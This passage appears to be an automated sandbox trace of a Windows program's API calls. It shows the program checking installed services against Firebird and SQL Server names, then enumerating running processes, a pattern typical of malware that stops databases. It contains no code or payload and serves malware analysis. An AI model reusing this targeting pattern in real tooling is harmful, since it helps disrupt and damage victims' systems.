lpString2="CryptSvc") returned 1 [0283.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0283.216] lstrlenW (lpString="DcomLaunch") returned 10 [0283.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0283.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0283.216] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0283.216] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0283.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0283.216] lstrlenW (lpString="DeviceAssociationService") returned 24 [0283.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0283.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0283.216] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0283.216] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0283.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0283.216] lstrlenW (lpString="Dhcp") returned 4 [0283.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0283.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0283.217] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0283.217] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0283.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0283.217] lstrlenW (lpString="Dnscache") returned 8 [0283.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0283.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0283.217] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0283.217] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0283.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0283.217] lstrlenW (lpString="DPS") returned 3 [0283.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0283.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0283.217] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0283.217] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0283.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0283.217] lstrlenW (lpString="DusmSvc") returned 7 [0283.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0283.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0283.217] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0283.217] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0283.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0283.217] lstrlenW (lpString="EventLog") returned 8 [0283.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0283.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0283.217] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0283.217] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0283.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0283.218] lstrlenW (lpString="EventSystem") returned 11 [0283.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0283.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0283.218] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0283.218] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0283.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0283.218] lstrlenW (lpString="FontCache") returned 9 [0283.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0283.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0283.218] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0283.218] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0283.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0283.218] lstrlenW (lpString="gpsvc") returned 5 [0283.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0283.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0283.218] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0283.218] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0283.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0283.218] lstrlenW (lpString="iphlpsvc") returned 8 [0283.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0283.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0283.218] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0283.218] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0283.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0283.218] lstrlenW (lpString="KeyIso") returned 6 [0283.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0283.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0283.219] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0283.219] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0283.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0283.219] lstrlenW (lpString="LanmanServer") returned 12 [0283.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0283.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0283.219] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0283.219] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0283.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0283.219] lstrlenW (lpString="LanmanWorkstation") returned 17 [0283.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0283.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0283.219] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0283.219] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0283.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0283.219] lstrlenW (lpString="lfsvc") returned 5 [0283.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0283.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0283.219] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0283.219] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0283.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0283.219] lstrlenW (lpString="lmhosts") returned 7 [0283.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0283.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0283.220] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0283.220] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0283.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0283.220] lstrlenW (lpString="LSM") returned 3 [0283.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0283.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0283.220] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0283.220] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0283.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0283.220] lstrlenW (lpString="MpsSvc") returned 6 [0283.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0283.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0283.220] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0283.220] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0283.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0283.220] lstrlenW (lpString="NcbService") returned 10 [0283.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0283.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0283.220] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0283.220] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0283.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0283.220] lstrlenW (lpString="netprofm") returned 8 [0283.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0283.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0283.220] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0283.220] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0283.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0283.220] lstrlenW (lpString="NgcSvc") returned 6 [0283.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0283.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0283.220] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0283.221] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0283.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0283.221] lstrlenW (lpString="NlaSvc") returned 6 [0283.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0283.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0283.221] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0283.221] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0283.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0283.221] lstrlenW (lpString="nsi") returned 3 [0283.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0283.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0283.221] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0283.221] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0283.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0283.221] lstrlenW (lpString="PcaSvc") returned 6 [0283.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0283.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0283.221] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0283.221] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0283.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0283.221] lstrlenW (lpString="PlugPlay") returned 8 [0283.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0283.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0283.221] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0283.221] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0283.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0283.222] lstrlenW (lpString="Power") returned 5 [0283.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0283.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0283.222] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0283.222] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0283.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0283.222] lstrlenW (lpString="ProfSvc") returned 7 [0283.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0283.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0283.222] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0283.222] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0283.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0283.222] lstrlenW (lpString="RpcEptMapper") returned 12 [0283.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0283.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0283.222] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0283.222] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0283.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0283.222] lstrlenW (lpString="RpcSs") returned 5 [0283.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0283.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0283.222] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0283.222] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0283.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0283.222] lstrlenW (lpString="SamSs") returned 5 [0283.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0283.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0283.222] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0283.222] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0283.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0283.223] lstrlenW (lpString="Schedule") returned 8 [0283.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0283.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0283.223] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0283.223] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0283.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0283.223] lstrlenW (lpString="SecurityHealthService") returned 21 [0283.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0283.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0283.223] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0283.223] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0283.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0283.223] lstrlenW (lpString="SENS") returned 4 [0283.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0283.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0283.223] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0283.223] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0283.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0283.223] lstrlenW (lpString="ShellHWDetection") returned 16 [0283.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0283.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0283.223] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0283.223] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0283.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0283.223] lstrlenW (lpString="Spooler") returned 7 [0283.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0283.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0283.224] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0283.224] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0283.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0283.224] lstrlenW (lpString="StateRepository") returned 15 [0283.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0283.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0283.224] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0283.224] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0283.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0283.224] lstrlenW (lpString="SysMain") returned 7 [0283.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0283.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0283.224] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0283.224] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0283.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0283.224] lstrlenW (lpString="SystemEventsBroker") returned 18 [0283.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0283.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0283.224] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0283.224] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0283.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0283.224] lstrlenW (lpString="Themes") returned 6 [0283.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0283.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0283.225] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0283.225] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0283.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0283.225] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0283.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0283.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0283.444] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0283.444] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0283.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0283.444] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0283.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0283.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0283.445] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0283.445] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0283.445] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4011ea8 | out: hHeap=0x470000) returned 1 [0283.445] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x348 [0283.464] Process32FirstW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.464] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0283.465] lstrlenW (lpString="System") returned 6 [0283.465] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0283.465] lstrlenW (lpString="smss.exe") returned 8 [0283.466] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.466] lstrlenW (lpString="csrss.exe") returned 9 [0283.466] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0283.467] lstrlenW (lpString="wininit.exe") returned 11 [0283.467] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.468] lstrlenW (lpString="csrss.exe") returned 9 [0283.468] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0283.469] lstrlenW (lpString="winlogon.exe") returned 12 [0283.469] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0283.469] lstrlenW (lpString="services.exe") returned 12 [0283.470] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0283.470] lstrlenW (lpString="lsass.exe") returned 9 [0283.470] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0283.470] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0283.470] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0283.471] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0283.471] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.471] lstrlenW (lpString="svchost.exe") returned 11 [0283.471] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.472] lstrlenW (lpString="svchost.exe") returned 11 [0283.472] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0283.472] lstrlenW (lpString="dwm.exe") returned 7 [0283.472] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.473] lstrlenW (lpString="svchost.exe") returned 11 [0283.473] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.474] lstrlenW (lpString="svchost.exe") returned 11 [0283.474] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.474] lstrlenW (lpString="svchost.exe") returned 11 [0283.474] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.475] lstrlenW (lpString="svchost.exe") returned 11 [0283.475] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.480] lstrlenW (lpString="svchost.exe") returned 11 